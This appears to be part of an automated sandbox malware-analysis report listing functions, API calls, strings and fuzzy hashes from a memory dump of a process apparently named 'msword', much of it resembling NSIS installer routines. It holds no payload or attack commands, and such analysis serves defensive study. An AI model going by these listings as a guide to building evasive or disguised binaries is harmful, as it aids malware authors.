Instruction Fuzzy Hash: 02415E74A00205BFCF04EFA0CC99EAE7B79FF48314B20456AF915EB2E1C679A941CB54

Function 00402E18 Relevance: 1.5, APIs: 1, Instructions: 27fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402E27

Memory Dump Source

Source File: 0000000F.00000002.2027790046.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2027760605.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027814834.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2028104601.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
Instruction ID: b91193b5dd17d351e639dca097a4c2443a83fae7855d8014906372cda19badf2
Opcode Fuzzy Hash: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
Instruction Fuzzy Hash: 4EE06D32600204AFD700EB749D45ABE736CDF01329F20457BF146F20D1E6B89A41976A

Function 004063AC Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
lstrlenW.KERNEL32(?), ref: 004063CC
GetVersionExW.KERNEL32(?), ref: 0040642A

Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031

LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
FreeLibrary.KERNEL32(00000000), ref: 004064D4
GlobalFree.KERNEL32(?), ref: 004064DD

Strings

Unknown, xrefs: 004064FC
GetModuleBaseNameW, xrefs: 00406494
Module32FirstW, xrefs: 004065D3
CreateToolhelp32Snapshot, xrefs: 004065B5
EnumProcesses, xrefs: 00406482
Kernel32.DLL, xrefs: 0040659B
EnumProcessModules, xrefs: 0040648A
Process32NextW, xrefs: 004065C8
Module32NextW, xrefs: 004065DE
Process32FirstW, xrefs: 004065BD
PSAPI.DLL, xrefs: 00406464

Memory Dump Source

Source File: 0000000F.00000002.2027790046.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2027760605.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027814834.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2028104601.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
API String ID: 20674999-2124804629
Opcode ID: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
Instruction ID: f5db07f83b48746be4b9c4f5c588c21b75103c60b5638216cabcef37c42edb4d
Opcode Fuzzy Hash: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
Instruction Fuzzy Hash: 38919331900219EBDF109FA4CD88AAFBBB8EF44741F11447BE546F6281DB388A51CF68

Function 004040B8 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
GetDlgItem.USER32(?,000003E8), ref: 00404181
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040419E
GetSysColor.USER32(?), ref: 004041AF
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041BD
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041CB
lstrlenW.KERNEL32(?), ref: 004041D6
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004041E3
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004041F2

Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404124,?), ref: 00403FE1
Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404124,?), ref: 00403FF0
Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404124,?), ref: 00404004

GetDlgItem.USER32(?,0000040A), ref: 0040424A
SendMessageW.USER32(00000000), ref: 00404251
GetDlgItem.USER32(?,000003E8), ref: 0040427E
SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042C1
LoadCursorW.USER32(00000000,00007F02), ref: 004042CF
SetCursor.USER32(00000000), ref: 004042D2
ShellExecuteW.SHELL32(0000070B,open,00462540,00000000,00000000,00000001), ref: 004042E7
LoadCursorW.USER32(00000000,00007F00), ref: 004042F3
SetCursor.USER32(00000000), ref: 004042F6
SendMessageW.USER32(00000111,00000001,00000000), ref: 00404325
SendMessageW.USER32(00000010,00000000,00000000), ref: 00404337

Strings

open, xrefs: 004042DF
N, xrefs: 0040426C
@%F, xrefs: 004042A7

Memory Dump Source

Source File: 0000000F.00000002.2027790046.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2027760605.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027814834.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2028104601.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
String ID: @%F$N$open
API String ID: 3928313111-3849437375
Opcode ID: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
Instruction ID: 2c1438ad93098d7b112eeb2502b55652a68651cb38e922ac8f4fb42b83a973d4
Opcode Fuzzy Hash: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
Instruction Fuzzy Hash: 0F71A4B1900609FFDB109F60DD45EAA7B79FB44305F00843AFA05B62D1C778A991CF99

Function 00406A99 Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 163filestringmemoryCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(0045B2C8,NUL,?,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AA9
CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1

Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8

GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
wsprintfA.USER32 ref: 00406B4D
GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37

Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76

WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
GlobalFree.KERNEL32(00000000), ref: 00406C52
CloseHandle.KERNEL32(?), ref: 00406C5C

Strings

%s=%s, xrefs: 00406B43
NUL, xrefs: 00406A9E
F, xrefs: 00406AE8
[Rename], xrefs: 00406BC8, 00406BD7

Memory Dump Source

Source File: 0000000F.00000002.2027790046.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2027760605.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027814834.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2028104601.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
String ID: F$%s=%s$NUL$[Rename]
API String ID: 565278875-1653569448
Opcode ID: a2f4805b9b6d14c41e9e3fa236157f8587e3d6293513dd7448d110fd9e4d9510
Instruction ID: f97e154d5ee7f709bd30e138c0dd6e282719408add8f0d739c14b832633f1bd9
Opcode Fuzzy Hash: a2f4805b9b6d14c41e9e3fa236157f8587e3d6293513dd7448d110fd9e4d9510
Instruction Fuzzy Hash: AE412632104208BFE6206B619E8CD6B3B6CDF86754B16043EF586F22D1DA3CDC158ABC

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010D8
FillRect.USER32(00000000,?,00000000), ref: 004010ED
DeleteObject.GDI32(?), ref: 004010F6
CreateFontIndirectW.GDI32(?), ref: 0040110E
SetBkMode.GDI32(00000000,00000001), ref: 0040112F
SetTextColor.GDI32(00000000,000000FF), ref: 00401139
SelectObject.GDI32(00000000,?), ref: 00401149
DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
SelectObject.GDI32(00000000,00000000), ref: 00401169
DeleteObject.GDI32(?), ref: 0040116E
EndPaint.USER32(?,?), ref: 00401177

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 0000000F.00000002.2027790046.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2027760605.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027814834.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2028104601.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
Instruction ID: e7530e13063599d95e155ed3b2c7b7521dfa2668d538c4695d9c695e9582dc0d
Opcode Fuzzy Hash: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
Instruction Fuzzy Hash: 01516C71400209AFCB058F95DE459AF7FB9FF45311F00802EF992AA1A0CB78DA55DFA4

Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
lstrlenW.KERNEL32(004130D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
RegCloseKey.ADVAPI32(?), ref: 004029E4

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
WriteReg: error creating key "%s\%s", xrefs: 004029F5
WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1

Memory Dump Source

Source File: 0000000F.00000002.2027790046.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2027760605.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027814834.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2028104601.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: lstrlen$CloseCreateValuewvsprintf
String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
API String ID: 1641139501-220328614
Opcode ID: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
Instruction ID: 4ea7a0066738be70411365ddd6f3e5606018e51d84950e7919a1ab5782edcef9
Opcode Fuzzy Hash: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
Instruction Fuzzy Hash: 3D41BFB2D00209BFDF11AF90CE46DAEBBB9EB04704F20407BF505B61A1D6B94B509B59

Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
GlobalFree.KERNEL32(00000000), ref: 00402F17
CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
DeleteFileW.KERNEL32(?), ref: 00402F56

Strings

created uninstaller: %d, "%s", xrefs: 00402F3B

Memory Dump Source

Source File: 0000000F.00000002.2027790046.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2027760605.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027814834.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2028104601.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWrite
String ID: created uninstaller: %d, "%s"
API String ID: 3294113728-3145124454
Opcode ID: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
Instruction ID: 876417c632a2c352b67fb01c84f3ccb8dada3a759dccfb7ac575e016526b3130
Opcode Fuzzy Hash: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
Instruction Fuzzy Hash: E231B272800115BBCB11AFA4CE45DAF7FB9EF08364F10023AF555B61E1CB794E419B98

Function 004060E7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72filestringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040619B
lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062D4,00000000), ref: 004061A2
WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7

Strings

RMDir: RemoveDirectory invalid input(""), xrefs: 00406195, 0040619A, 004061A1, 004061B0

Memory Dump Source

Source File: 0000000F.00000002.2027790046.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2027760605.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027814834.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2028104601.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
String ID: RMDir: RemoveDirectory invalid input("")
API String ID: 3734993849-2769509956
Opcode ID: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
Instruction ID: 719ae6cd10854ac59b0cdc08190af65770ef99398ad526dd54b0ef62760a23c4
Opcode Fuzzy Hash: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
Instruction Fuzzy Hash: 4621F271400200BBD710AB64DD88D9B376CEB02370B25C73AF626BA1E1E77449868BAD

Function 00403DCA Relevance: 12.1, APIs: 8, Instructions: 60COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
GetSysColor.USER32(00000000), ref: 00403E00
SetTextColor.GDI32(?,00000000), ref: 00403E0C
SetBkMode.GDI32(?,?), ref: 00403E18
GetSysColor.USER32(?), ref: 00403E2B
SetBkColor.GDI32(?,?), ref: 00403E3B
DeleteObject.GDI32(?), ref: 00403E55
CreateBrushIndirect.GDI32(?), ref: 00403E5F

Memory Dump Source

Source File: 0000000F.00000002.2027790046.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2027760605.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027814834.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2028104601.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
Instruction ID: efe235911933e34786796033030fc6f48e67331b78f43f6f4bde0ddab4ebbdd0
Opcode Fuzzy Hash: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
Instruction Fuzzy Hash: 7D1166715007046BCB219F78DE08B5BBFF8AF01755F048A2DE886F22A0D774DA48CB94

Function 004023F0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 83libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C

Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
FreeLibrary.KERNEL32(?,?), ref: 004024C3

Strings

Error registering DLL: Could not load %s, xrefs: 004024DB
Error registering DLL: Could not initialize OLE, xrefs: 004024F1
Error registering DLL: %s not found in %s, xrefs: 0040249A

Memory Dump Source

